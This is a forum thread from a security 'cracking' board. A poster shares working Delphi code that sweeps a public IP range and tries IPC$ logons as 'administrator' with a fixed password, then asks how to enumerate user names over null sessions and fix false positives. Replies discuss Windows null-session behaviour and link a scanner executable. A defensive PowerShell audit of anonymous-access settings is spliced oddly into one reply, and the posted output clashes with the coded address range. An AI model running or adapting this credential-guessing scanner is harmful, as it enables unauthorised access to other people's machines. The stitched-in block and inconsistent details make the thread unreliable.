Forum: Programming & Cracking    Title: A question about IPC scanning.
Author: yulihu [yulihu]    Forum user
program Project1;

{$APPTYPE CONSOLE}

uses
  SysUtils,
  Windows,
  Winsock;

const
  MAX_THREAD = 70;

var
  StartIp: DWORD;
  EndIp: DWORD;
  LoopIP: DWORD;
  dwScanThreadId: DWORD;
  IpcThreadNumber: Integer;   // number of running scan threads, shared by all threads

// Thread procedure, one thread per address. CreateThread expects a DWORD result,
// so the Boolean result type of the original is replaced with DWORD.
function ScanPassOfIPC(PcIp: Pointer): DWORD; stdcall;
var
  NetResource: TNetResource;
  ScanIP: DWORD;
  StrIp: string;
  server_address: sockaddr_in;
begin
  Result := 0;
  ScanIP := DWORD(PcIp);                        // host-order address handed over as the thread parameter
  server_address.sin_addr.S_addr := htonl(ScanIP);
  StrIp := '\\' + inet_ntoa(server_address.sin_addr) + '\ipc$';
  ZeroMemory(@NetResource, SizeOf(NetResource));
  with NetResource do
  begin
    dwScope := RESOURCE_GLOBALNET;
    dwType := RESOURCETYPE_ANY;
    lpLocalName := nil;                         // IPC$ gets no local device name
    lpRemoteName := PChar(StrIp);
    lpProvider := nil;
  end;
  // Parameter order is (NetResource, password, user name, flags).
  if WNetAddConnection2(NetResource, 'mmbest', 'administrator', 0) = NO_ERROR then
  begin
    WriteLn(StrIp + ' Open');
    Result := 1;
    if WNetCancelConnection2(PChar(StrIp), 0, True) = NO_ERROR then
      WriteLn('delED');
  end;
  // The original used a plain dec() here, which races with inc() in the main thread.
  InterlockedDecrement(IpcThreadNumber);
end;

begin
  IpcThreadNumber := 0;
  StartIp := ntohl(inet_addr('219.222.99.1'));
  EndIp := ntohl(inet_addr('219.222.100.100'));

  for LoopIP := StartIp to EndIp do
  begin
    // Throttle: wait while MAX_THREAD scan threads are still running.
    while IpcThreadNumber >= MAX_THREAD do
    begin
      WriteLn('Thread bigger than 70');
      Sleep(2000);
    end;
    // Count the thread before it starts so the worker cannot decrement first.
    InterlockedIncrement(IpcThreadNumber);
    if CreateThread(nil, 0, @ScanPassOfIPC, Pointer(LoopIP), 0, dwScanThreadId) <> 0 then
      WriteLn(IntToStr(IpcThreadNumber) + 'th')
    else
      InterlockedDecrement(IpcThreadNumber);
  end;
  Sleep(90000);   // crude wait for the last threads; they are never joined
end.






Original poster    Posted: 10/11 19:44

Reply: yulihu [yulihu]    Forum user
\\192.168.99.6\ipc$Open
delED
\\192.168.99.18\ipc$Open
delED
\\192.168.99.47\ipc$Open
delED
\\192.168.99.42\ipc$Open
delED
\\192.168.99.54\ipc$Open
delED
\\192.168.99.69\ipc$Open
delED
\\192.168.99.91\ipc$Open
delED
\\192.168.99.106\ipc$Open
delED
\\192.168.99.119\ipc$Open
delED
\\192.168.99.136\ipc$Open
delED
\\192.168.99.162\ipc$Open
delED
\\192.168.99.240\ipc$Open
delED
\\192.168.100.28\ipc$Open
delED

But I do know

Floor B1    Posted: 10/11 19:46

Reply: yulihu [yulihu]    Forum user
Apart from 192.168.9.6, whose password really is mmbest,
all the other "successful" connections such as \\192.168.100.28\ipc$Open are false positives.
Some people say WNetAddConnection2 has a problem with connections to XP machines.
I don't know whether that is really the case.
Can someone tell me how the 20cn scanner solves this?
After the connection returns NO_ERROR, would it work to decide by whether other services can then be used?


Floor B2    Posted: 10/11 19:51

Reply: yulihu [yulihu]    Forum user
Is nobody willing to take a look?
Is it that you don't want to answer, or that nobody has read it, or some other reason? Please say something at least.
I have been waiting a week for an answer.

Floor B3    Posted: 10/20 10:56

Reply: 286 [unique]    Moderator
IPC scanning actually works by exploiting the fact that an empty user name and password could list the other side's user names. That feature was a heavy blow to the security of Windows NT/2000, so from XP/2003 on the operating system does not allow user names to be enumerated by default. So it no longer works.
I haven't looked at your code carefully, but I suspect the previous connection was not closed before the next one started connecting.


Floor B4    Posted: 10/21 17:24

Reply: yulihu [yulihu]    Forum user
"IPC scanning actually works by exploiting the fact that an empty user name and password could list the other side's user names. That feature was a heavy blow to the security of Windows NT/2000, so from XP/2003 on the operating system does not allow user names to be enumerated by default. So it no longer works."
Then why can the 20cn scanner enumerate them normally? What method does it use?
After I changed the program to single-threaded the false positives were exactly the same, so it shouldn't be a matter of the next scan thread starting before the previous one is closed.


Floor B5    Posted: 10/22 07:41

Reply: 286 [unique]    Moderator
I have only used 20cn once, and I don't recall seeing a user-name listing feature (maybe I didn't notice); I only saw it directly list the user names and passwords of accounts in the administrators group.
You had better ask the author.

Floor B6    Posted: 10/22 10:09

Reply: mousewolf [mousewolf]    Forum user
Heh~~
That answer seems rather far-fetched!!



Floor B7    Posted: 10/29 23:17

Reply: shesh [shesh]    Moderator
I have the 20CN source code.

It does list user names.

Without grouping. I haven't looked at the specific code; you had better ask 和尚 himself.

Some firewalls nowadays will make this function misbehave.

Floor B8    Posted: 10/29 23:20

Reply: 286 [unique]    Moderator
To 无兄 or 和兄:
A long time ago I also wrote one, and for some reason it could not scan out XP user names, only those of 2000.
The reason is probably the same as the poster's. http://www.20cn.org/~unique/Download/Program/LetMeIn.exe

Floor B9    Posted: 10/30 09:22

Reply: yulihu [yulihu]    Forum user
On XP every null connection, and every wrong user name and password, succeeds.
Is that why the user names cannot be obtained?
Which API is used to enumerate user names after a successful null connection?



[This post was edited by yulihu(yulihu) on 10/30 at 12:01]

Floor B10    Posted: 10/30 12:37
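Added example (my code, not from the thread or the 20CN scanner): a PowerShell audit, run locally on the host being checked, of the LSA settings behind what 286 and yulihu describe: whether null sessions may still enumerate accounts (RestrictAnonymous, RestrictAnonymousSAM, EveryoneIncludesAnonymous), and whether XP's ForceGuest maps every network logon to Guest, which is my reading of why any user name and password "succeeds" and WNetAddConnection2 returns NO_ERROR. The registry value names are real Windows settings; the defaults assumed for missing values are stated in the comments.

```powershell
# Added example: audit the LSA settings behind the behaviour discussed in this thread.
# Run locally, in an elevated PowerShell, on the host being checked.
$lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$props = Get-ItemProperty -Path $lsa

# Read a DWORD value; a missing value is treated as the default given by the caller.
function Get-LsaValue([string]$Name, [int]$Default) {
    $v = $props.$Name
    if ($null -eq $v) { return $Default }
    return [int]$v
}

$findings = @()

# RestrictAnonymous: 0 = null sessions may list accounts and shares (NT/2000 default),
# 1 = no enumeration of SAM accounts and shares, 2 = no access without explicit anonymous permissions.
$ra = Get-LsaValue 'RestrictAnonymous' 0
if ($ra -lt 1) { $findings += "RestrictAnonymous=$ra : null sessions may enumerate users and shares" }

# RestrictAnonymousSAM: 1 (XP/2003 default) blocks anonymous enumeration of SAM accounts,
# which is the feature 286 describes as disabled by default since XP/2003.
$ras = Get-LsaValue 'RestrictAnonymousSAM' 1
if ($ras -ne 1) { $findings += "RestrictAnonymousSAM=$ras : anonymous SAM account enumeration allowed" }

# EveryoneIncludesAnonymous: 1 puts anonymous logons into Everyone and widens what a null session can read.
$eia = Get-LsaValue 'EveryoneIncludesAnonymous' 0
if ($eia -eq 1) { $findings += "EveryoneIncludesAnonymous=1 : anonymous logons receive Everyone permissions" }

# ForceGuest: 1 (XP 'simple file sharing') maps every network logon to Guest while Guest is enabled,
# so a logon with any password succeeds and a WNetAddConnection2 check reports NO_ERROR (assumed cause).
$fg = Get-LsaValue 'ForceGuest' 0
if ($fg -eq 1) { $findings += "ForceGuest=1 : network logons map to Guest; password checks report false positives" }

# Shares and pipes explicitly opened to null sessions widen anonymous access further.
$srv = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$srvProps = Get-ItemProperty -Path $srv -ErrorAction SilentlyContinue
foreach ($name in 'NullSessionShares', 'NullSessionPipes') {
    $list = @($srvProps.$name | Where-Object { $_ })
    if ($list.Count -gt 0) { $findings += "$name : $($list -join ', ')" }
}

if ($findings.Count -eq 0) { 'No weak anonymous-access settings found.' } else { $findings }
```

Each finding names the value to tighten; the hardened state is RestrictAnonymous at 1 or higher, RestrictAnonymousSAM at 1, EveryoneIncludesAnonymous at 0, ForceGuest at 0 with Guest disabled, and empty NullSessionShares/NullSessionPipes lists.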

Reply: ricky [ricky]    Moderator
Please post this kind of question in the software development board in future.

Floor B11    Posted: 10/31 18:24

Reply: yulihu [yulihu]    Forum user
Got it, thanks.

Floor B12    Posted: 11/02 19:44

Copyright © 2000-2010 20CN Security Group. All Rights Reserved.